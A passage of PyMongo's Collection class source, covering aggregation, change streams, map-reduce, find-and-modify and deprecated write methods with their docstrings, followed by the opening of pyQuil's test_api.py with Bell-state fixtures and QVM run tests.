A :class:`~pymongo.command_cursor.CommandCursor` over the result
set.
.. versionchanged:: 3.6
Added the `session` parameter. Added the `maxAwaitTimeMS` option.
Deprecated the `useCursor` option.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.0
The :meth:`aggregate` method always returns a CommandCursor. The
pipeline argument must be a list.
.. versionchanged:: 2.7
When the cursor option is used, return
:class:`~pymongo.command_cursor.CommandCursor` instead of
:class:`~pymongo.cursor.Cursor`.
.. versionchanged:: 2.6
Added cursor support.
.. versionadded:: 2.3
.. seealso:: :doc:`/examples/aggregation`
.. _aggregate command:
https://docs.mongodb.com/manual/reference/command/aggregate
"""
with self.__database.client._tmp_session(session, close=False) as s:
return self._aggregate(pipeline,
CommandCursor,
kwargs.get('batchSize'),
session=s,
explicit_session=session is not None,
**kwargs)
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.aggregate_raw_batches([
... {'$project': {'x': {'$multiply': [2, '$x']}}}])
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: aggregate_raw_batches does not support sessions.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"aggregate_raw_batches does not support sessions")
return self._aggregate(pipeline, RawBatchCommandCursor, 0,
None, False, **kwargs)
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Performs an aggregation with an implicit initial ``$changeStream``
stage and returns a
:class:`~pymongo.change_stream.CollectionChangeStream` cursor which
iterates over changes on this collection.
Introduced in MongoDB 3.6.
.. code-block:: python
with db.collection.watch() as stream:
for change in stream:
print(change)
The :class:`~pymongo.change_stream.CollectionChangeStream` iterable
blocks until the next change document is returned or an error is
raised. If the
:meth:`~pymongo.change_stream.CollectionChangeStream.next` method
encounters a network error when retrieving a batch from the server,
it will automatically attempt to recreate the cursor such that no
change events are missed. Any error encountered during the resume
attempt indicates there may be an outage and will be raised.
.. code-block:: python
try:
with db.collection.watch(
[{'$match': {'operationType': 'insert'}}]) as stream:
for insert_change in stream:
print(insert_change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
.. note:: Using this helper method is preferred to directly calling
:meth:`~pymongo.collection.Collection.aggregate` with a
``$changeStream`` stage, for the purpose of supporting
resumability.
.. warning:: This Collection's :attr:`read_concern` must be
``ReadConcern("majority")`` in order to use the ``$changeStream``
stage.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument to pass as an option
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `start_at_operation_time` (optional): If provided, the resulting
change stream will only return changes that occurred at or after
the specified :class:`~bson.timestamp.Timestamp`. Requires
MongoDB >= 4.0.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~pymongo.change_stream.CollectionChangeStream` cursor.
.. versionchanged:: 3.7
Added the ``start_at_operation_time`` parameter.
.. versionadded:: 3.6
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams/change-streams.rst
"""
return CollectionChangeStream(
self, pipeline, full_document, resume_after, max_await_time_ms,
batch_size, collation, start_at_operation_time, session
)
def group(self, key, condition, initial, reduce, finalize=None, **kwargs):
"""Perform a query similar to an SQL *group by* operation.
**DEPRECATED** - The group command was deprecated in MongoDB 3.4. The
:meth:`~group` method is deprecated and will be removed in PyMongo 4.0.
Use :meth:`~aggregate` with the `$group` stage or :meth:`~map_reduce`
instead.
.. versionchanged:: 3.5
Deprecated the group method.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated argument: command
"""
warnings.warn("The group method is deprecated and will be removed in "
"PyMongo 4.0. Use the aggregate method with the $group "
"stage or the map_reduce method instead.",
DeprecationWarning, stacklevel=2)
group = {}
if isinstance(key, string_type):
group["$keyf"] = Code(key)
elif key is not None:
group = {"key": helpers._fields_list_to_dict(key, "key")}
group["ns"] = self.__name
group["$reduce"] = Code(reduce)
group["cond"] = condition
group["initial"] = initial
if finalize is not None:
group["finalize"] = Code(finalize)
cmd = SON([("group", group)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session=None) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
collation=collation)["retval"]
def rename(self, new_name, session=None, **kwargs):
"""Rename this collection.
If operating in auth mode, client must be authorized as an
admin to perform this operation. Raises :class:`TypeError` if
`new_name` is not an instance of :class:`basestring`
(:class:`str` in python 3). Raises :class:`~pymongo.errors.InvalidName`
if `new_name` is not a valid collection name.
:Parameters:
- `new_name`: new name for this collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the rename command
may be passed as keyword arguments to this helper method
(i.e. ``dropTarget=True``)
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
if not isinstance(new_name, string_type):
raise TypeError("new_name must be an "
"instance of %s" % (string_type.__name__,))
if not new_name or ".." in new_name:
raise InvalidName("collection names cannot be empty")
if new_name[0] == "." or new_name[-1] == ".":
raise InvalidName("collecion names must not start or end with '.'")
if "$" in new_name and not new_name.startswith("oplog.$main"):
raise InvalidName("collection names must not contain '$'")
new_name = "%s.%s" % (self.__database.name, new_name)
cmd = SON([("renameCollection", self.__full_name), ("to", new_name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, session)
with self._socket_for_writes() as sock_info:
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
'admin', cmd,
write_concern=write_concern,
parse_write_concern_error=True,
session=s, client=self.__database.client)
def distinct(self, key, filter=None, session=None, **kwargs):
"""Get a list of distinct values for `key` among all documents
in this collection.
Raises :class:`TypeError` if `key` is not an instance of
:class:`basestring` (:class:`str` in python 3).
All optional distinct parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
The :meth:`distinct` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `key`: name of the field for which we want to get the distinct
values
- `filter` (optional): A query document that specifies the documents
from which to retrieve the distinct values.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
"""
if not isinstance(key, string_type):
raise TypeError("key must be an "
"instance of %s" % (string_type.__name__,))
cmd = SON([("distinct", self.__name),
("key", key)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern,
collation=collation, session=session)["values"]
def map_reduce(self, map, reduce, out, full_response=False, session=None,
**kwargs):
"""Perform a map/reduce operation on this collection.
If `full_response` is ``False`` (default) returns a
:class:`~pymongo.collection.Collection` instance containing
the results of the operation. Otherwise, returns the full
response from the server to the `map reduce command`_.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `out`: output collection name or `out object` (dict). See
the `map reduce command`_ documentation for available options.
Note: `out` options are order sensitive. :class:`~bson.son.SON`
can be used to specify multiple options.
e.g. SON([('replace', <collection name>), ('db', <database name>)])
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.map_reduce(map, reduce, "myresults", limit=2)
.. note:: The :meth:`map_reduce` method does **not** obey the
:attr:`read_preference` of this :class:`Collection`. To run
mapReduce on a secondary use the :meth:`inline_map_reduce` method
instead.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation (if the
output is not inline) when using MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. seealso:: :doc:`/examples/aggregation`
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated arguments: merge_output and reduce_output
.. _map reduce command: http://docs.mongodb.org/manual/reference/command/mapReduce/
.. mongodoc:: mapreduce
"""
if not isinstance(out, (string_type, abc.Mapping)):
raise TypeError("'out' must be an instance of "
"%s or a mapping" % (string_type.__name__,))
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", out)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
inline = 'inline' in cmd['out']
sock_ctx, read_pref = self._socket_for_primary_reads(session)
with sock_ctx as (sock_info, slave_ok):
if (sock_info.max_wire_version >= 4 and 'readConcern' not in cmd and
inline):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and not inline:
write_concern = self._write_concern_for(session)
else:
write_concern = None
response = self._command(
sock_info, cmd, slave_ok, read_pref,
read_concern=read_concern,
write_concern=write_concern,
collation=collation, session=session)
if full_response or not response.get('result'):
return response
elif isinstance(response['result'], dict):
dbase = response['result']['db']
coll = response['result']['collection']
return self.__database.client[dbase][coll]
else:
return self.__database[response["result"]]
def inline_map_reduce(self, map, reduce, full_response=False, session=None,
**kwargs):
"""Perform an inline map/reduce operation on this collection.
Perform the map/reduce operation on the server in RAM. A result
collection is not created. The result set is returned as a list
of documents.
If `full_response` is ``False`` (default) returns the
result documents in a list. Otherwise, returns the full
response from the server to the `map reduce command`_.
The :meth:`inline_map_reduce` method obeys the :attr:`read_preference`
of this :class:`Collection`.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.inline_map_reduce(map, reduce, limit=2)
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
"""
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", {"inline": 1})])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
if sock_info.max_wire_version >= 4 and 'readConcern' not in cmd:
res = self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern,
collation=collation, session=session)
else:
res = self._command(sock_info, cmd, slave_ok,
collation=collation, session=session)
if full_response:
return res
else:
return res.get("results")
def _write_concern_for_cmd(self, cmd, session):
raw_wc = cmd.get('writeConcern')
if raw_wc is not None:
return WriteConcern(**raw_wc)
else:
return self._write_concern_for(session)
def __find_and_modify(self, filter, projection, sort, upsert=None,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Internal findAndModify helper."""
common.validate_is_mapping("filter", filter)
if not isinstance(return_document, bool):
raise ValueError("return_document must be "
"ReturnDocument.BEFORE or ReturnDocument.AFTER")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name),
("query", filter),
("new", return_document)])
cmd.update(kwargs)
if projection is not None:
cmd["fields"] = helpers._fields_list_to_dict(projection,
"projection")
if sort is not None:
cmd["sort"] = helpers._index_document(sort)
if upsert is not None:
common.validate_boolean("upsert", upsert)
cmd["upsert"] = upsert
write_concern = self._write_concern_for_cmd(cmd, session)
def _find_and_modify(session, sock_info, retryable_write):
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use '
'arrayFilters.')
if not write_concern.acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged '
'writes.')
cmd["arrayFilters"] = array_filters
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
out = self._command(sock_info, cmd,
read_preference=ReadPreference.PRIMARY,
write_concern=write_concern,
allowable_errors=[_NO_OBJ_ERROR],
collation=collation, session=session,
retryable_write=retryable_write)
_check_write_command_response(out)
return out.get("value")
return self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, session)
def find_one_and_delete(self, filter,
projection=None, sort=None, session=None, **kwargs):
"""Finds a single document and deletes it, returning the document.
>>> db.test.count_documents({'x': 1})
2
>>> db.test.find_one_and_delete({'x': 1})
{u'x': 1, u'_id': ObjectId('54f4e12bfba5220aa4d6dee8')}
>>> db.test.count_documents({'x': 1})
1
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'x': 1}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_delete(
... {'x': 1}, sort=[('_id', pymongo.DESCENDING)])
{u'x': 1, u'_id': 2}
The *projection* option can be used to limit the fields returned.
>>> db.test.find_one_and_delete({'x': 1}, projection={'_id': False})
{u'x': 1}
:Parameters:
- `filter`: A query that matches the document to delete.
- `projection` (optional): a list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is deleted.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
kwargs['remove'] = True
return self.__find_and_modify(filter, projection, sort,
session=session, **kwargs)
def find_one_and_replace(self, filter, replacement,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
session=None, **kwargs):
"""Finds a single document and replaces it, returning either the
original or the replaced document.
The :meth:`find_one_and_replace` method differs from
:meth:`find_one_and_update` by replacing the document matched by
*filter*, rather than modifying the existing document.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_replace({'x': 1}, {'y': 1})
{u'x': 1, u'_id': 0}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The replacement document.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is replaced.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was replaced, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the replaced
or inserted document.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_replace(replacement)
kwargs['update'] = replacement
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
session=session, **kwargs)
def find_one_and_update(self, filter, update,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Finds a single document and updates it, returning either the
original or the updated document.
>>> db.test.find_one_and_update(
... {'_id': 665}, {'$inc': {'count': 1}, '$set': {'done': True}})
{u'_id': 665, u'done': False, u'count': 25}}
By default :meth:`find_one_and_update` returns the original version of
the document before the update was applied. To return the updated
version of the document instead, use the *return_document* option.
>>> from pymongo import ReturnDocument
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... return_document=ReturnDocument.AFTER)
{u'_id': u'userid', u'seq': 1}
You can limit the fields returned with the *projection* option.
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... return_document=ReturnDocument.AFTER)
{u'seq': 2}
The *upsert* option can be used to create the document if it doesn't
already exist.
>>> db.example.delete_many({}).deleted_count
1
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... upsert=True,
... return_document=ReturnDocument.AFTER)
{u'seq': 1}
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'done': True}):
... print(doc)
...
{u'_id': 665, u'done': True, u'result': {u'count': 26}}
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
>>> db.test.find_one_and_update(
... {'done': True},
... {'$set': {'final': True}},
... sort=[('_id', pymongo.DESCENDING)])
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The update operations to apply.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is updated.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was updated, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the updated
or inserted document.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added the `array_filters` and `session` options.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
kwargs['update'] = update
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
array_filters, session=session, **kwargs)
def save(self, to_save, manipulate=True, check_keys=True, **kwargs):
"""Save a document in this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`replace_one` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("save is deprecated. Use insert_one or replace_one "
"instead", DeprecationWarning, stacklevel=2)
common.validate_is_document_type("to_save", to_save)
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
if not (isinstance(to_save, RawBSONDocument) or "_id" in to_save):
return self._insert(
to_save, True, check_keys, manipulate, write_concern)
else:
self._update_retryable(
{"_id": to_save["_id"]}, to_save, True,
check_keys, False, manipulate, write_concern,
collation=collation)
return to_save.get("_id")
def insert(self, doc_or_docs, manipulate=True,
check_keys=True, continue_on_error=False, **kwargs):
"""Insert a document(s) into this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`insert_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("insert is deprecated. Use insert_one or insert_many "
"instead.", DeprecationWarning, stacklevel=2)
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._insert(doc_or_docs, not continue_on_error,
check_keys, manipulate, write_concern)
def update(self, spec, document, upsert=False, manipulate=False,
multi=False, check_keys=True, **kwargs):
"""Update a document(s) in this collection.
**DEPRECATED** - Use :meth:`replace_one`, :meth:`update_one`, or
:meth:`update_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("update is deprecated. Use replace_one, update_one or "
"update_many instead.", DeprecationWarning, stacklevel=2)
common.validate_is_mapping("spec", spec)
common.validate_is_mapping("document", document)
if document:
# If a top level key begins with '$' this is a modify operation
# and we should skip key validation. It doesn't matter which key
# we check here. Passing a document with a mix of top level keys
# starting with and without a '$' is invalid and the server will
# raise an appropriate exception.
first = next(iter(document))
if first.startswith('$'):
check_keys = False
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._update_retryable(
spec, document, upsert, check_keys, multi, manipulate,
write_concern, collation=collation)
def remove(self, spec_or_id=None, multi=True, **kwargs):
"""Remove a document(s) from this collection.
**DEPRECATED** - Use :meth:`delete_one` or :meth:`delete_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("remove is deprecated. Use delete_one or delete_many "
"instead.", DeprecationWarning, stacklevel=2)
if spec_or_id is None:
spec_or_id = {}
if not isinstance(spec_or_id, abc.Mapping):
spec_or_id = {"_id": spec_or_id}
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._delete_retryable(
spec_or_id, multi, write_concern, collation=collation)
def find_and_modify(self, query={}, update=None,
upsert=False, sort=None, full_response=False,
manipulate=False, **kwargs):
"""Update and return an object.
**DEPRECATED** - Use :meth:`find_one_and_delete`,
:meth:`find_one_and_replace`, or :meth:`find_one_and_update` instead.
"""
warnings.warn("find_and_modify is deprecated, use find_one_and_delete"
", find_one_and_replace, or find_one_and_update instead",
DeprecationWarning, stacklevel=2)
if not update and not kwargs.get('remove', None):
raise ValueError("Must either update or remove")
if update and kwargs.get('remove', None):
raise ValueError("Can't do both update and remove")
# No need to include empty args
if query:
kwargs['query'] = query
if update:
kwargs['update'] = update
if upsert:
kwargs['upsert'] = upsert
if sort:
# Accept a list of tuples to match Cursor's sort parameter.
if isinstance(sort, list):
kwargs['sort'] = helpers._index_document(sort)
# Accept OrderedDict, SON, and dict with len == 1 so we
# don't break existing code already using find_and_modify.
elif (isinstance(sort, ORDERED_TYPES) or
isinstance(sort, dict) and len(sort) == 1):
warnings.warn("Passing mapping types for `sort` is deprecated,"
" use a list of (key, direction) pairs instead",
DeprecationWarning, stacklevel=2)
kwargs['sort'] = sort
else:
raise TypeError("sort must be a list of (key, direction) "
"pairs, a dict of len 1, or an instance of "
"SON or OrderedDict")
fields = kwargs.pop("fields", None)
if fields is not None:
kwargs["fields"] = helpers._fields_list_to_dict(fields, "fields")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, None)
def _find_and_modify(session, sock_info, retryable_write):
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
result = self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
allowable_errors=[_NO_OBJ_ERROR], collation=collation,
session=session, retryable_write=retryable_write)
_check_write_command_response(result)
return result
out = self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, None)
if not out['ok']:
if out["errmsg"] == _NO_OBJ_ERROR:
return None
else:
# Should never get here b/c of allowable_errors
raise ValueError("Unexpected Error: %s" % (out,))
if full_response:
return out
else:
document = out.get('value')
if manipulate:
document = self.__database._fix_outgoing(document, self)
return document
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Collection' object is not iterable")
next = __next__
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
if "." not in self.__name:
raise TypeError("'Collection' object is not callable. If you "
"meant to call the '%s' method on a 'Database' "
"object it is failing because no such method "
"exists." %
self.__name)
raise TypeError("'Collection' object is not callable. If you meant to "
"call the '%s' method on a 'Collection' object it is "
"failing because no such method exists." %
self.__name.split(".")[-1])
|
test_api.py
|
#!/usr/bin/python
##############################################################################
# Copyright 2016-2017 Rigetti Computing
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
import asyncio
import json
import os
import signal
import time
from math import pi
from multiprocessing import Process
from unittest.mock import patch
import networkx as nx
import numpy as np
import pytest
import requests_mock
from rpcq import Server
from rpcq.messages import (
BinaryExecutableRequest,
BinaryExecutableResponse,
)
from pyquil.api import QVMConnection, QPUCompiler, get_qc, QVMCompiler
from pyquil.api._base_connection import (
validate_noise_probabilities,
validate_qubit_list,
prepare_register_list,
)
from pyquil.device import ISA, NxDevice
from pyquil.gates import CNOT, H, MEASURE, PHASE, Z, RZ, RX, CZ
from pyquil.paulis import PauliTerm
from pyquil.quil import Program
from pyquil.quilbase import Halt, Declare
from pyquil.quilatom import MemoryReference
EMPTY_PROGRAM = Program()
BELL_STATE = Program(H(0), CNOT(0, 1))
BELL_STATE_MEASURE = Program(
Declare("ro", "BIT", 2),
H(0),
CNOT(0, 1),
MEASURE(0, MemoryReference("ro", 0)),
MEASURE(1, MemoryReference("ro", 1)),
)
COMPILED_BELL_STATE = Program(
[
RZ(pi / 2, 0),
RX(pi / 2, 0),
RZ(-pi / 2, 1),
RX(pi / 2, 1),
CZ(1, 0),
RZ(-pi / 2, 0),
RX(-pi / 2, 1),
RZ(pi / 2, 1),
Halt(),
]
)
DUMMY_ISA_DICT = {"1Q": {"0": {}, "1": {}}, "2Q": {"0-1": {}}}
DUMMY_ISA = ISA.from_dict(DUMMY_ISA_DICT)
COMPILED_BYTES_ARRAY = b"SUPER SECRET PACKAGE"
RB_ENCODED_REPLY = [[0, 0], [1, 1]]
RB_REPLY = [Program("H 0\nH 0\n"), Program("PHASE(pi/2) 0\nPHASE(pi/2) 0\n")]
def test_sync_run_mock(qvm: QVMConnection):
mock_qvm = qvm
mock_endpoint = mock_qvm.sync_endpoint
def mock_response(request, context):
assert json.loads(request.text) == {
"type": "multishot",
"addresses": {"ro": [0, 1]},
"trials": 2,
"compiled-quil": "DECLARE ro BIT[2]\nH 0\nCNOT 0 1\nMEASURE 0 ro[0]\nMEASURE 1 ro[1]\n",
"rng-seed": 52,
}
return '{"ro": [[0,0],[1,1]]}'
with requests_mock.Mocker() as m:
m.post(mock_endpoint + "/qvm", text=mock_response)
assert mock_qvm.run(BELL_STATE_MEASURE, [0, 1], trials=2) == [[0, 0], [1, 1]]
# Test no classical addresses
m.post(mock_endpoint + "/qvm", text=mock_response)
assert mock_qvm.run(BELL_STATE_MEASURE, trials=2) == [[0, 0], [1, 1]]
with pytest.raises(ValueError):
mock_qvm.run(EMPTY_PROGRAM)
def test_sync_run(qvm: QVMConnection):
assert qvm.run(BELL_STATE_MEASURE, [0, 1], trials=2) == [[0, 0], [1, 1]]
# Test range as well
assert qvm.run(BELL_STATE_MEASURE, range(2), trials=2) == [[0, 0], [1, 1]]
# Test numpy ints
assert qvm.run(BELL_STATE_MEASURE, np.arange(2), trials=2) == [[0, 0], [1, 1]]
# Test no classical addresses
assert qvm.run(BELL_STATE_MEASURE, trials=2) == [[0, 0], [1, 1]]
with pytest.raises(ValueError):
qvm.run(EMPTY_PROGRAM)
